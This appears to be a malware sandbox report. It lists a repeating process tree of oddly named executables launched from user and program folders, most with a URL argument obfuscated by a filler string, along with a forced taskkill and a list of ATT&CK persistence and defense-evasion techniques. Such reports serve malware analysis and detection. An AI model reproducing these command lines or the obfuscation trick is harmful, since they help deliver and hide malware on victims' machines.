C:\Users\Admin\AppData\Local\Ceaseless.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:9720

C:\Program Files (x86)\havre\Lashing.exe
"C:\Program Files (x86)\havre\Lashing.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:6076

C:\Program Files (x86)\Caret\gridding.exe
"C:\Program Files (x86)\Caret\gridding.exe"
1⤵
PID:7528

C:\Program Files (x86)\Neurobiological\Ceaseless.exe
"C:\Program Files (x86)\Neurobiological\Ceaseless.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:3796

C:\Program Files (x86)\Neurobiological\theocracy.exe
"C:\Program Files (x86)\Neurobiological\theocracy.exe"
1⤵
PID:7584

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Ceaseless.exe
2⤵
- Kills process with taskkill
PID:1224

C:\Users\Admin\AppData\Local\Ceaseless.exe
C:\Users\Admin\AppData\Local\Ceaseless.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:3928

C:\Program Files (x86)\havre\Lashing.exe
"C:\Program Files (x86)\havre\Lashing.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:5048

C:\Program Files (x86)\Neurobiological\conveyances.exe
"C:\Program Files (x86)\Neurobiological\conveyances.exe"
1⤵
PID:4972

C:\Users\Admin\AppData\Local\unproductive.exe
C:\Users\Admin\AppData\Local\unproductive.exe
1⤵
PID:7476

C:\Users\Admin\AppData\Local\hcf.exe
C:\Users\Admin\AppData\Local\hcf.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:5312

C:\Users\Admin\AppData\Local\Temp\nse4BA7.tmp\Ceaseless.exe
C:\Users\Admin\AppData\Local\Temp\nse4BA7.tmp\Ceaseless.exe ""tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB""
2⤵
PID:3768

C:\Program Files (x86)\Sewer\Lashing.exe
"C:\Program Files (x86)\Sewer\Lashing.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:8776

C:\Program Files (x86)\Sewer\Ceaseless.exe
"C:\Program Files (x86)\Sewer\Ceaseless.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:7912

C:\Users\Admin\AppData\Local\Lashing.exe
C:\Users\Admin\AppData\Local\Lashing.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:2168

C:\Users\Admin\AppData\Local\Ceaseless.exe
C:\Users\Admin\AppData\Local\Ceaseless.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:5928

C:\Program Files (x86)\havre\Lashing.exe
"C:\Program Files (x86)\havre\Lashing.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:6672

C:\Users\Admin\AppData\Local\hcf.exe
C:\Users\Admin\AppData\Local\hcf.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:4908

C:\Users\Admin\AppData\Local\unproductive.exe
C:\Users\Admin\AppData\Local\unproductive.exe
1⤵
PID:4280

C:\Program Files (x86)\Neurobiological\conveyances.exe
"C:\Program Files (x86)\Neurobiological\conveyances.exe"
1⤵
PID:8332

C:\Users\Admin\AppData\Local\Ceaseless.exe
C:\Users\Admin\AppData\Local\Ceaseless.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:9756

C:\Program Files (x86)\havre\Lashing.exe
"C:\Program Files (x86)\havre\Lashing.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:8100

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x150 0x3cc
1⤵
PID:1524

C:\Program Files (x86)\Neurobiological\theocracy.exe
"C:\Program Files (x86)\Neurobiological\theocracy.exe"
1⤵
PID:3404

C:\Program Files (x86)\Caret\gridding.exe
"C:\Program Files (x86)\Caret\gridding.exe"
1⤵
PID:7924

C:\Users\Admin\AppData\Local\unproductive.exe
C:\Users\Admin\AppData\Local\unproductive.exe
1⤵
PID:9744

C:\Program Files (x86)\havre\Lashing.exe
"C:\Program Files (x86)\havre\Lashing.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:1412

C:\Users\Admin\AppData\Local\Ceaseless.exe
C:\Users\Admin\AppData\Local\Ceaseless.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:9612

C:\Program Files (x86)\Neurobiological\conveyances.exe
"C:\Program Files (x86)\Neurobiological\conveyances.exe"
1⤵
PID:8152

C:\Users\Admin\AppData\Local\hcf.exe
C:\Users\Admin\AppData\Local\hcf.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:8576

C:\Program Files (x86)\Neurobiological\Ceaseless.exe
"C:\Program Files (x86)\Neurobiological\Ceaseless.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:8852

C:\Program Files (x86)\havre\Lashing.exe
"C:\Program Files (x86)\havre\Lashing.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:10028

C:\Users\Admin\AppData\Local\hcf.exe
C:\Users\Admin\AppData\Local\hcf.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:7540

C:\Users\Admin\AppData\Local\unproductive.exe
C:\Users\Admin\AppData\Local\unproductive.exe
1⤵
PID:3920

C:\Users\Admin\AppData\Local\Ceaseless.exe
C:\Users\Admin\AppData\Local\Ceaseless.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:10220

C:\Users\Admin\AppData\Local\Lashing.exe
C:\Users\Admin\AppData\Local\Lashing.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:9764

C:\Program Files (x86)\Neurobiological\conveyances.exe
"C:\Program Files (x86)\Neurobiological\conveyances.exe"
1⤵
PID:9688

C:\Program Files (x86)\Sewer\Ceaseless.exe
"C:\Program Files (x86)\Sewer\Ceaseless.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:7012

C:\Program Files (x86)\Sewer\Lashing.exe
"C:\Program Files (x86)\Sewer\Lashing.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:4668

C:\Users\Admin\AppData\Local\Ceaseless.exe
C:\Users\Admin\AppData\Local\Ceaseless.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:8684

C:\Program Files (x86)\havre\Lashing.exe
"C:\Program Files (x86)\havre\Lashing.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:3848

C:\Program Files (x86)\Caret\gridding.exe
"C:\Program Files (x86)\Caret\gridding.exe"
1⤵
PID:8580

C:\Users\Admin\AppData\Local\unproductive.exe
C:\Users\Admin\AppData\Local\unproductive.exe
1⤵
PID:9968

C:\Users\Admin\AppData\Local\Ceaseless.exe
C:\Users\Admin\AppData\Local\Ceaseless.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:1300

C:\Program Files (x86)\havre\Lashing.exe
"C:\Program Files (x86)\havre\Lashing.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:9940

C:\Program Files (x86)\Neurobiological\conveyances.exe
"C:\Program Files (x86)\Neurobiological\conveyances.exe"
1⤵
PID:8976

C:\Users\Admin\AppData\Local\hcf.exe
C:\Users\Admin\AppData\Local\hcf.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:3024

C:\Users\Admin\AppData\Local\hcf.exe
C:\Users\Admin\AppData\Local\hcf.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:5984

C:\Users\Admin\AppData\Local\unproductive.exe
C:\Users\Admin\AppData\Local\unproductive.exe
1⤵
PID:10036

C:\Program Files (x86)\Neurobiological\conveyances.exe
"C:\Program Files (x86)\Neurobiological\conveyances.exe"
1⤵
PID:2756

C:\Users\Admin\AppData\Local\Ceaseless.exe
C:\Users\Admin\AppData\Local\Ceaseless.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:7436

C:\Program Files (x86)\havre\Lashing.exe
"C:\Program Files (x86)\havre\Lashing.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:10140

C:\Program Files (x86)\Caret\gridding.exe
"C:\Program Files (x86)\Caret\gridding.exe"
1⤵
PID:8484

C:\Users\Admin\AppData\Local\unproductive.exe
C:\Users\Admin\AppData\Local\unproductive.exe
1⤵
PID:7632

C:\Users\Admin\AppData\Local\Ceaseless.exe
C:\Users\Admin\AppData\Local\Ceaseless.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:816

C:\Program Files (x86)\havre\Lashing.exe
"C:\Program Files (x86)\havre\Lashing.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:8932

C:\Program Files (x86)\Neurobiological\conveyances.exe
"C:\Program Files (x86)\Neurobiological\conveyances.exe"
1⤵
PID:9104

C:\Users\Admin\AppData\Local\hcf.exe
C:\Users\Admin\AppData\Local\hcf.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:5088

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

Persistence

Modify Existing Service

New Service

T1050

Scheduled Task

Privilege Escalation

New Service

T1050

Scheduled Task

Defense Evasion

Modify Registry

Disabling Security Tools